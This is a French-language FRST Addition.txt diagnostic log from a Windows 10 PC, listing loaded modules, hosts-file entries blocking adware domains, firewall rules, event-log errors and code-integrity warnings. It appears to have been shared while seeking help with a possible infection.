ShortcutWithArgument: C:\Users\Pierre\Desktop\Divers\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic

==================== Modules chargés (Avec liste blanche) ==============

2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2015-06-25 09:45 - 2015-06-25 09:45 - 00017920 _____ () C:\Program Files (x86)\GIGABYTE\AppCenter\AdjustService.exe
2016-10-29 01:12 - 2017-05-03 22:21 - 01267320 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-09-25 01:20 - 2016-09-25 01:21 - 00189264 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2017-03-18 22:59 - 2017-03-20 07:11 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-23 10:40 - 2017-03-23 10:40 - 01850800 _____ () C:\Program Files (x86)\GIGABYTE\AppCenter\ApCent.exe
2017-04-07 09:41 - 2017-04-07 09:41 - 00054488 _____ () C:\Program Files\CCleaner\branding.dll
2017-05-05 18:07 - 2017-05-05 18:07 - 00077824 _____ () C:\Program Files\CCleaner\lang\lang-1036.dll
2016-08-09 19:49 - 2016-08-09 19:49 - 01804800 _____ () C:\Program Files (x86)\GIGABYTE\AppCenter\BDR_info.dll
2015-02-16 10:47 - 2015-02-16 10:47 - 00105472 _____ () C:\Program Files (x86)\GIGABYTE\AppCenter\ycc.dll
2017-05-27 13:32 - 2017-05-27 13:32 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-05-27 13:32 - 2017-05-27 13:32 - 00997896 _____ () C:\Program Files\AVAST Software\Avast\AvChrome.dll
2017-05-27 13:32 - 2017-05-27 13:32 - 67717632 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-05-27 13:32 - 2017-05-27 13:32 - 00176992 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
2017-05-27 13:32 - 2017-05-27 13:32 - 00223224 _____ () C:\Program Files\AVAST Software\Avast\tasks_core.dll
2017-05-27 13:32 - 2017-05-27 13:32 - 00291824 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2016-10-29 00:50 - 2016-10-29 00:50 - 00144896 _____ () C:\Users\Pierre\AppData\Local\MyComGames\zlib1.dll
2016-10-29 00:50 - 2016-10-29 00:50 - 00076176 _____ () C:\Users\Pierre\AppData\Local\MyComGames\pxd.dll
2016-10-29 00:50 - 2016-10-29 00:50 - 00186256 _____ () C:\Users\Pierre\AppData\Local\MyComGames\LightUpdate.dll
2016-10-29 00:50 - 2017-03-14 19:48 - 02411408 _____ () C:\Users\Pierre\AppData\Local\MyComGames\BigUp2.dll
2016-05-23 20:36 - 2016-05-23 20:36 - 48962048 _____ () C:\Users\Pierre\AppData\Local\MyComGames\Chrome\3.2623.1401\libcef.dll
2017-05-27 12:35 - 2017-05-27 09:03 - 00347648 _____ () C:\Users\Pierre\AppData\Local\background_fault\bf.dll
2017-05-02 18:50 - 2017-05-02 18:50 - 01162752 _____ () C:\Users\Pierre\AppData\Local\Facebook\Games\CefSharp.Core.dll
2017-05-02 18:50 - 2017-05-02 18:50 - 67197440 _____ () C:\Users\Pierre\AppData\Local\Facebook\Games\libcef.dll
2017-05-02 18:50 - 2017-05-02 18:50 - 00752640 _____ () C:\Users\Pierre\AppData\Local\Facebook\Games\CefSharp.BrowserSubprocess.Core.dll
2017-05-02 18:50 - 2017-05-02 18:50 - 01886208 _____ () C:\Users\Pierre\AppData\Local\Facebook\Games\libglesv2.dll
2017-05-02 18:50 - 2017-05-02 18:50 - 00078848 _____ () C:\Users\Pierre\AppData\Local\Facebook\Games\libegl.dll

==================== Alternate Data Streams (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)


==================== Mode sans échec (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)


==================== Internet Explorer sites de confiance/sensibles ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)


==================== Hosts contenu: ==========================

(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)

2016-07-16 13:47 - 2017-05-13 01:50 - 00002278 _____ C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       union.baidu2019.com
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       union.baidu2019.com
127.0.0.1 v1.ff.avast.com 
127.0.0.1 vlcproxy.ff.avast.com 
127.0.0.1 wepcdisplaysystem.com
127.0.0.1 wepcanalyticsystem.com
127.0.0.1 healthydownload.com
127.0.0.1 leading2download.com
127.0.0.1 dwl0.wizzlabs.com
127.0.0.1 dwl1.wizzlabs.com
127.0.0.1 wemsofts.com
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 beautifllink.xyz
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz

Il y a 6 plus de lignes.


==================== Autres zones ============================

(Actuellement, il n'y a pas de correction automatique pour cette section.)

HKU\S-1-5-21-684585145-4270999654-1484381816-1004\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Le Pare-feu est activé.

==================== MSCONFIG/TASK MANAGER éléments désactivés ==

HKLM\...\StartupApproved\Run: => "cFosSpeed"
HKLM\...\StartupApproved\Run: => "ShadowPlay"
HKLM\...\StartupApproved\Run32: => "FireStormStartUpAutoRun"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"

==================== RèglesPare-feu (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

FirewallRules: [{9EB11D71-7825-45AC-94DB-CDEC1F551641}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{E93EE552-2BE9-421A-BA28-B23A2BC36C7F}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{198F5CE3-F59A-4280-9A6F-1648D20C4BC6}] => (Allow) C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{59B11199-1BA2-428D-BF8E-7764EC72A2DE}] => (Allow) C:\Program Files\HP\HP Deskjet 1510 series\Bin\USBSetup.exe
FirewallRules: [{D148D179-9F9D-41FC-B3E8-5E4BBA1BC063}] => (Allow) C:\Program Files (x86)\devolo\dlan\devolonetsvc.exe
FirewallRules: [{45A9C820-8680-4037-8FC2-ECE84D4EA257}] => (Allow) C:\Program Files (x86)\devolo\dlan\devolonetsvc.exe
FirewallRules: [{5249A40E-5920-4B5F-9FA2-6585B7DA1F58}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{F925ECA8-296B-480F-97AB-9C88F1D6C1CC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B31EE4AD-9766-4B8B-AD00-274B96FE3AE8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{59A784B8-A998-4F5E-929B-AA1A639A315B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9F55C6F9-3C69-4411-B14B-75896F44D713}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{92DB8E24-6B33-43F3-B326-6E3DBBD80A6F}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{BF85DA71-D227-4E64-B219-E539581E07C2}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{607495AB-5D4E-4926-B7C7-1E207AC25778}C:\users\pierre\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\pierre\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [TCP Query User{16B1D20F-3AFA-486D-B11B-FEA7DCB20B9F}C:\users\pierre\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\pierre\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [TCP Query User{48D81303-EAB9-42E3-854A-ED7C8C5E1A3A}C:\users\pierre\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\pierre\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [UDP Query User{9631CB67-4C90-4D41-9C69-A189551918E4}C:\users\pierre\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\pierre\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [{1981877A-B976-4652-B7C1-14521496B243}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{08967572-B71C-493C-9BB3-DC934DE9E27D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DC7FBF50-AD64-4B42-B7E5-20AB8FC6494C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CFE8A36E-7220-42D0-A0BD-4C53FC6AE8E8}] => (Allow) C:\Program Files (x86)\GIGABYTE\AppCenter\ApCent.exe
FirewallRules: [{98D7E427-E660-49C0-BA79-712C3839389B}] => (Allow) C:\Program Files (x86)\GIGABYTE\AppCenter\gcupd.exe
FirewallRules: [{6B8736F5-1746-4251-BAB6-28A40164BB15}] => (Allow) C:\Program Files (x86)\GIGABYTE\AppCenter\ApCent.exe
FirewallRules: [{BBD24F49-5C7A-4580-B4F8-D8BD86E723E6}] => (Allow) C:\Program Files (x86)\GIGABYTE\AppCenter\gcupd.exe
FirewallRules: [{304CAE4F-6EC4-4765-91F5-0BFB4D85EE60}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{C36D1A9F-B9EF-49A0-BC4D-7780FA3BC82E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{14B8FB9C-F73D-48E4-B2C9-EC257F3341AC}] => (Allow) C:\Program Files (x86)\MIO\loader\corsairxforcexlexssd_16298019000104161521.dat
FirewallRules: [{5EE56D5F-6EB5-4362-BA46-8029DD37D9E5}] => (Allow) C:\Program Files (x86)\MIO\loader\corsairxforcexlexssd_16298019000104161521.dat
FirewallRules: [{2CAC2588-BCFA-4DF0-BE8C-82C83ECC2AED}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596\SZBrowser.exe

==================== Points de restauration =========================

10-05-2017 17:11:06 Windows Update
11-05-2017 23:05:06 Removed EasyTuneEngineService
13-05-2017 01:19:18 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
13-05-2017 01:19:22 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030
20-05-2017 11:17:20 Removed EasyTuneEngineService
23-05-2017 20:34:42 Windows Update
25-05-2017 16:57:36 Installed EasyTuneEngineService

==================== Éléments en erreur du Gestionnaire de périphériques =============


==================== Erreurs du Journal des événements: =========================

Erreurs Application:
==================
Error: (05/27/2017 04:56:40 PM) (Source: Winlogon) (EventID: 4005) (User: )
Description: Le processus d’ouverture de session de Windows s’est terminé de manière inattendue.

Error: (05/27/2017 01:32:37 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: La création du contexte d’activation a échoué pour « C:\Program Files\AVAST Software\Avast\setup\iplugins\IStats.dll ».
Assembly dépendant Avast.VC110.CRT,processorArchitecture="x86",publicKeyToken="2036b14a11e83e4a",type="win32",version="11.0.60610.1" introuvable.
Utilisez sxstrace.exe pour un diagnostic détaillé.

Error: (05/27/2017 01:01:50 PM) (Source: EasyTune) (EventID: 0) (User: )
Description: System.InvalidOperationException: Le service EasyTuneEngineService est introuvable sur l'ordinateur '.'. ---> System.ComponentModel.Win32Exception: Le service spécifié n’existe pas en tant que service installé
   --- Fin de la trace de la pile d'exception interne ---
   à System.ServiceProcess.ServiceController.GenerateNames()
   à System.ServiceProcess.ServiceController.get_ServiceName()
   à System.ServiceProcess.ServiceController.GenerateStatus()
   à System.ServiceProcess.ServiceController.get_Status()
   à Gigabyte.Engine.Utilities.EasyTuneEngineServiceManagement.get_Status()
   à Gigabyte.Engine.Utilities.EasyTuneEngineServiceAsynchronizeManagement..ctor()
   à EasyTune.MainWindow.InitObjects()

Error: (05/27/2017 01:01:50 PM) (Source: EasyTune) (EventID: 0) (User: )
Description: System.Runtime.Remoting.RemotingException: Échec de la connexion à un port IPC : Le fichier spécifié est introuvable.
 

Server stack trace: 
   à System.Runtime.Remoting.Channels.Ipc.IpcPort.Connect(String portName, Boolean secure, TokenImpersonationLevel impersonationLevel, Int32 timeout)
   à System.Runtime.Remoting.Channels.Ipc.ConnectionCache.GetConnection(String portName, Boolean secure, TokenImpersonationLevel level, Int32 timeout)
   à System.Runtime.Remoting.Channels.Ipc.IpcClientTransportSink.ProcessMessage(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream, ITransportHeaders& responseHeaders, Stream& responseStream)
   à System.Runtime.Remoting.Channels.BinaryClientFormatterSink.SyncProcessMessage(IMessage msg)

Exception rethrown at [0]: 
   à System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
   à System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
   à Gigabyte.EnvironmentControl.Common.HardwareMonitor.IHardwareMonitorControl.Initialize(HardwareMonitorSourceTypes sourceType, Boolean bEnableMultiLanguage)
   à Gigabyte.Engine.EnvironmentControl.HardwareMonitor.HardwareMonitorControlModule.Initialize(HardwareMonitorSourceTypes sourceType, Boolean bEnableMultiLanguage)
   à EasyTune.Features.EmphasisHardwareMonitorUserControl.InitObjects(HardwareMonitorControlModule oHardwareMonitorManager)

Error: (05/27/2017 01:01:50 PM) (Source: EasyTune) (EventID: 0) (User: )
Description: System.InvalidOperationException: Le service EasyTuneEngineService est introuvable sur l'ordinateur '.'. ---> System.ComponentModel.Win32Exception: Le service spécifié n’existe pas en tant que service installé
   --- Fin de la trace de la pile d'exception interne ---
   à System.ServiceProcess.ServiceController.GenerateNames()
   à System.ServiceProcess.ServiceController.get_ServiceName()
   à System.ServiceProcess.ServiceController.GenerateStatus()
   à System.ServiceProcess.ServiceController.get_Status()
   à Gigabyte.Engine.Utilities.EasyTuneEngineServiceManagement.get_Status()
   à Gigabyte.Engine.Utilities.EasyTuneEngineServiceAsynchronizeManagement..ctor()
   à EasyTune.MainWindow.InitObjects()

Error: (05/27/2017 01:01:49 PM) (Source: EasyTune) (EventID: 0) (User: )
Description: System.Runtime.Remoting.RemotingException: Échec de la connexion à un port IPC : Le fichier spécifié est introuvable.
 

Server stack trace: 
   à System.Runtime.Remoting.Channels.Ipc.IpcPort.Connect(String portName, Boolean secure, TokenImpersonationLevel impersonationLevel, Int32 timeout)
   à System.Runtime.Remoting.Channels.Ipc.ConnectionCache.GetConnection(String portName, Boolean secure, TokenImpersonationLevel level, Int32 timeout)
   à System.Runtime.Remoting.Channels.Ipc.IpcClientTransportSink.ProcessMessage(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream, ITransportHeaders& responseHeaders, Stream& responseStream)
   à System.Runtime.Remoting.Channels.BinaryClientFormatterSink.SyncProcessMessage(IMessage msg)

Exception rethrown at [0]: 
   à System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
   à System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
   à Gigabyte.EnvironmentControl.Common.HardwareMonitor.IHardwareMonitorControl.Initialize(HardwareMonitorSourceTypes sourceType, Boolean bEnableMultiLanguage)
   à Gigabyte.Engine.EnvironmentControl.HardwareMonitor.HardwareMonitorControlModule.Initialize(HardwareMonitorSourceTypes sourceType, Boolean bEnableMultiLanguage)
   à EasyTune.Features.EmphasisHardwareMonitorUserControl.InitObjects(HardwareMonitorControlModule oHardwareMonitorManager)

Error: (05/27/2017 01:01:42 PM) (Source: EasyTune) (EventID: 0) (User: )
Description: System.InvalidOperationException: Le service EasyTuneEngineService est introuvable sur l'ordinateur '.'. ---> System.ComponentModel.Win32Exception: Le service spécifié n’existe pas en tant que service installé
   --- Fin de la trace de la pile d'exception interne ---
   à System.ServiceProcess.ServiceController.GenerateNames()
   à System.ServiceProcess.ServiceController.get_ServiceName()
   à System.ServiceProcess.ServiceController.GenerateStatus()
   à System.ServiceProcess.ServiceController.get_Status()
   à Gigabyte.Engine.Utilities.EasyTuneEngineServiceManagement.get_Status()
   à Gigabyte.Engine.Utilities.EasyTuneEngineServiceAsynchronizeManagement..ctor()
   à EasyTune.MainWindow.InitObjects()

Error: (05/27/2017 01:01:42 PM) (Source: EasyTune) (EventID: 0) (User: )
Description: System.Runtime.Remoting.RemotingException: Échec de la connexion à un port IPC : Le fichier spécifié est introuvable.
 

Server stack trace: 
   à System.Runtime.Remoting.Channels.Ipc.IpcPort.Connect(String portName, Boolean secure, TokenImpersonationLevel impersonationLevel, Int32 timeout)
   à System.Runtime.Remoting.Channels.Ipc.ConnectionCache.GetConnection(String portName, Boolean secure, TokenImpersonationLevel level, Int32 timeout)
   à System.Runtime.Remoting.Channels.Ipc.IpcClientTransportSink.ProcessMessage(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream, ITransportHeaders& responseHeaders, Stream& responseStream)
   à System.Runtime.Remoting.Channels.BinaryClientFormatterSink.SyncProcessMessage(IMessage msg)

Exception rethrown at [0]: 
   à System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
   à System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
   à Gigabyte.EnvironmentControl.Common.HardwareMonitor.IHardwareMonitorControl.Initialize(HardwareMonitorSourceTypes sourceType, Boolean bEnableMultiLanguage)
   à Gigabyte.Engine.EnvironmentControl.HardwareMonitor.HardwareMonitorControlModule.Initialize(HardwareMonitorSourceTypes sourceType, Boolean bEnableMultiLanguage)
   à EasyTune.Features.EmphasisHardwareMonitorUserControl.InitObjects(HardwareMonitorControlModule oHardwareMonitorManager)

Error: (05/27/2017 12:48:25 PM) (Source: HP Active Health) (EventID: 600) (User: )
Description: Agent System threw an exception: System.ArgumentOutOfRangeException: The added or subtracted value results in an un-representable DateTime.
Parameter name: value
   at System.DateTime.AddTicks(Int64 value)
   at HP.ActiveHealth.Commons.Utils.ManufactureDateUtils.GetDateTimeForManufactureWeekCode(String weekCode)
   at HP.ActiveHealth.Commons.Utils.CTLabelSingleton.CTLabelInfo..ctor(String ctLabel)
   at HP.ActiveHealth.Agents.System.SystemAgent.FetchSystemValue()
   at HP.ActiveHealth.Agents.System.SystemAgent.CollectNewDataClasses(FileInfo agentStateFile, IDataClassCollector dataClassColector)
   at HP.ActiveHealth.API.DataGeneration.AgentRunner.QueryAgentDelegate(Object agentObj)

Error: (05/27/2017 12:35:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante rundll32.exe, version : 10.0.15063.0, horodatage : 0xe5f810c5
Nom du module défaillant : XOBc.dll, version : 0.0.0.0, horodatage : 0x5929288a
Code d’exception : 0xc0000409
Décalage d’erreur : 0x00011ebb
ID du processus défaillant : 0x608
Heure de début de l’application défaillante : 0x01d2d6d4e346d4a9
Chemin d’accès de l’application défaillante : C:\Windows\syswow64\rundll32.exe
Chemin d’accès du module défaillant: C:\Program Files (x86)\{BF806E86-D527-4CF5-B0D9-91223BE0F365}\_ALLOWDEL_32d8961\XOBc.dll
ID de rapport : 0c267a30-14f2-4eaa-a821-9f6c9c0555c3
Nom complet du package défaillant : 
ID de l’application relative au package défaillant :


Erreurs système:
=============
Error: (05/27/2017 06:26:27 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Service Google Update (gupdate) n’a pas pu démarrer en raison de l’erreur : 
Le fichier spécifié est introuvable.

Error: (05/27/2017 06:24:26 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service MBAMService n’a pas pu démarrer en raison de l’erreur : 
Le fichier spécifié est introuvable.

Error: (05/27/2017 06:24:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service CldFlt n’a pas pu démarrer en raison de l’erreur : 
Cette demande n’est pas prise en charge.

Error: (05/27/2017 06:24:23 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: L’arrêt système précédant à 16:53:57 le ‎27/‎05/‎2017 n’était pas prévu.

Error: (05/27/2017 04:59:42 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service NlaSvc.

Error: (05/27/2017 04:59:12 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service iphlpsvc.

Error: (05/27/2017 04:58:40 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service NlaSvc.

Error: (05/27/2017 04:58:10 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service iphlpsvc.

Error: (05/27/2017 01:35:08 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Le service tw786546 s’est terminé de façon inattendue pour la 1ème fois.

Error: (05/27/2017 01:11:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Le service terana s’est terminé de façon inattendue pour la 1ème fois.


CodeIntegrity:
===================================
  Date: 2017-05-27 12:52:34.362
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\Pierre\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-25 20:39:59.625
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Pierre\Program Files (x86)\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-25 20:39:35.264
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Pierre\Program Files (x86)\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-20 11:15:57.693
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Pierre\Program Files (x86)\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-20 11:15:57.459
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Pierre\Program Files (x86)\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-19 20:23:28.608
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\Windows.UI.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-05-19 20:14:13.213
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\Windows.UI.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-05-19 18:49:44.374
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\WinMetadata\Windows.Graphics.winmd because the set of per-page image hashes could not be found on the system.

  Date: 2017-05-19 18:49:44.035
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\Windows.UI.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-05-19 17:30:00.013
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\WinMetadata\Windows.Graphics.winmd because the set of per-page image hashes could not be found on the system.


==================== Infos Mémoire =========================== 

Processeur: Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz
Pourcentage de mémoire utilisée: 15%
Mémoire physique - RAM - totale: 16341.09 MB
Mémoire physique - RAM - disponible: 13807.14 MB
Mémoire virtuelle totale: 18773.09 MB
Mémoire virtuelle disponible: 15992.05 MB

==================== Lecteurs ================================

Drive c: (SSD) (Fixed) (Total:222.28 GB) (Free:145.65 GB) NTFS

==================== MBR & Table des partitions ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 223.6 GB) (Disk ID: E0BAA793)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=222.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=815 MB) - (Type=27)

==================== Fin de Addition.txt ============================